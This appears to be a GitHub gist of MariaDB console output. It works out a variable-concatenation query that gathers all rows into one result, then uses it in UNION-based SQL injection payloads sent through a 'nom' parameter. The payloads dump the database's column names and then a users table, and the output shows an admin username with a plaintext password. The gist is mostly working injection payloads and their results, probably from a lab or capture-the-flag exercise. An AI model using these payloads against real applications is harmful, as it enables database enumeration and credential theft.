Created
March 18, 2018 15:38
-
-
Save Creased/70fcbd3682438a07b75feb59535074ad to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MariaDB [(none)]> SHOW DATABASES; | |
| +--------------------+ | |
| | Database | | |
| +--------------------+ | |
| | app | | |
| | information_schema | | |
| | mysql | | |
| | performance_schema | | |
| +--------------------+ | |
| 4 rows in set (0.00 sec) | |
| MariaDB [(none)]> SHOW TABLES FROM information_schema; | |
| +---------------------------------------+ | |
| | Tables_in_information_schema | | |
| +---------------------------------------+ | |
| | ALL_PLUGINS | | |
| | APPLICABLE_ROLES | | |
| | CHARACTER_SETS | | |
| | COLLATIONS | | |
| | COLLATION_CHARACTER_SET_APPLICABILITY | | |
| | COLUMNS | | |
| | COLUMN_PRIVILEGES | | |
| | ENABLED_ROLES | | |
| | ENGINES | | |
| | EVENTS | | |
| | FILES | | |
| | GLOBAL_STATUS | | |
| | GLOBAL_VARIABLES | | |
| | KEY_CACHES | | |
| | KEY_COLUMN_USAGE | | |
| | PARAMETERS | | |
| | PARTITIONS | | |
| | PLUGINS | | |
| | PROCESSLIST | | |
| | PROFILING | | |
| | REFERENTIAL_CONSTRAINTS | | |
| | ROUTINES | | |
| | SCHEMATA | | |
| | SCHEMA_PRIVILEGES | | |
| | SESSION_STATUS | | |
| | SESSION_VARIABLES | | |
| | STATISTICS | | |
| | SYSTEM_VARIABLES | | |
| | TABLES | | |
| | TABLESPACES | | |
| | TABLE_CONSTRAINTS | | |
| | TABLE_PRIVILEGES | | |
| | TRIGGERS | | |
| | USER_PRIVILEGES | | |
| | VIEWS | | |
| | GEOMETRY_COLUMNS | | |
| | SPATIAL_REF_SYS | | |
| | CLIENT_STATISTICS | | |
| | INDEX_STATISTICS | | |
| | INNODB_SYS_DATAFILES | | |
| | TABLE_STATISTICS | | |
| | INNODB_SYS_TABLESTATS | | |
| | USER_STATISTICS | | |
| | INNODB_SYS_INDEXES | | |
| | XTRADB_RSEG | | |
| | INNODB_CMP_PER_INDEX | | |
| | INNODB_TRX | | |
| | CHANGED_PAGE_BITMAPS | | |
| | INNODB_FT_BEING_DELETED | | |
| | INNODB_LOCK_WAITS | | |
| | INNODB_LOCKS | | |
| | INNODB_TABLESPACES_ENCRYPTION | | |
| | XTRADB_INTERNAL_HASH_TABLES | | |
| | INNODB_SYS_FIELDS | | |
| | INNODB_CMPMEM_RESET | | |
| | INNODB_CMP | | |
| | INNODB_FT_INDEX_TABLE | | |
| | INNODB_SYS_TABLESPACES | | |
| | INNODB_MUTEXES | | |
| | INNODB_BUFFER_PAGE_LRU | | |
| | INNODB_SYS_FOREIGN_COLS | | |
| | INNODB_CMP_RESET | | |
| | INNODB_BUFFER_POOL_STATS | | |
| | INNODB_FT_INDEX_CACHE | | |
| | INNODB_SYS_FOREIGN | | |
| | INNODB_METRICS | | |
| | INNODB_FT_DEFAULT_STOPWORD | | |
| | INNODB_CMPMEM | | |
| | INNODB_SYS_TABLES | | |
| | INNODB_SYS_COLUMNS | | |
| | INNODB_FT_CONFIG | | |
| | INNODB_BUFFER_PAGE | | |
| | INNODB_CMP_PER_INDEX_RESET | | |
| | XTRADB_READ_VIEW | | |
| | INNODB_SYS_SEMAPHORE_WAITS | | |
| | INNODB_CHANGED_PAGES | | |
| | INNODB_FT_DELETED | | |
| | INNODB_TABLESPACES_SCRUBBING | | |
| +---------------------------------------+ | |
| 78 rows in set (0.00 sec) | |
| MariaDB [(none)]> DESC information_schema.SCHEMATA; | |
| +----------------------------+--------------+------+-----+---------+-------+ | |
| | Field | Type | Null | Key | Default | Extra | | |
| +----------------------------+--------------+------+-----+---------+-------+ | |
| | CATALOG_NAME | varchar(512) | NO | | | | | |
| | SCHEMA_NAME | varchar(64) | NO | | | | | |
| | DEFAULT_CHARACTER_SET_NAME | varchar(32) | NO | | | | | |
| | DEFAULT_COLLATION_NAME | varchar(32) | NO | | | | | |
| | SQL_PATH | varchar(512) | YES | | NULL | | | |
| +----------------------------+--------------+------+-----+---------+-------+ | |
| 5 rows in set (0.00 sec) | |
| MariaDB [(none)]> SELECT SCHEMA_NAME FROM information_schema.SCHEMATA; | |
| +--------------------+ | |
| | SCHEMA_NAME | | |
| +--------------------+ | |
| | app | | |
| | information_schema | | |
| | mysql | | |
| | performance_schema | | |
| +--------------------+ | |
| 4 rows in set (0.00 sec) | |
| MariaDB [(none)]> SELECT concat(SCHEMA_NAME, '<br />') FROM information_schema.SCHEMATA; | |
| +-------------------------------+ | |
| | concat(SCHEMA_NAME, '<br />') | | |
| +-------------------------------+ | |
| | app<br /> | | |
| | information_schema<br /> | | |
| | mysql<br /> | | |
| | performance_schema<br /> | | |
| +-------------------------------+ | |
| 4 rows in set (0.00 sec) | |
| MariaDB [(none)]> (SELECT (@a) FROM (SELECT (@a:=0x00), (SELECT (@a) FROM (information_schema.SCHEMATA) WHERE (@a) IN (@a:=concat(@a, SCHEMA_NAME, '<br />')))) AS a); | |
| +-----------------------------------------------------------------------+ | |
| | (@a) | | |
| +-----------------------------------------------------------------------+ | |
| | app<br />information_schema<br />mysql<br />performance_schema<br /> | | |
| +-----------------------------------------------------------------------+ | |
| 1 row in set (0.00 sec) | |
| nom=' AND False UNION SELECT 1,2,3,4,(SELECT (@a) FROM (SELECT (@a:=''), (SELECT (@a) FROM (information_schema.COLUMNS) WHERE TABLE_SCHEMA != 'information_schema' AND (@a) IN (@a:=concat(@a, TABLE_SCHEMA, ' > ', TABLE_NAME, ' > ', COLUMN_NAME, '\n')))) AS a) -- | |
| db > jeux > nom | |
| db > jeux > image | |
| db > jeux > prix | |
| db > jeux > support | |
| db > jeux > editeur | |
| db > users > user | |
| db > users > pass | |
| nom=' AND False UNION SELECT 1,2,3,4,(SELECT CONVERT(@a USING latin1) FROM (SELECT (@a:=''), (SELECT (@a) FROM (db.users) WHERE (@a) IN (@a:=concat(@a, user, ' > ', pass, '\n')))) AS a) -- | |
| admin > S€cr3t-p4$$w0o0rd! | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment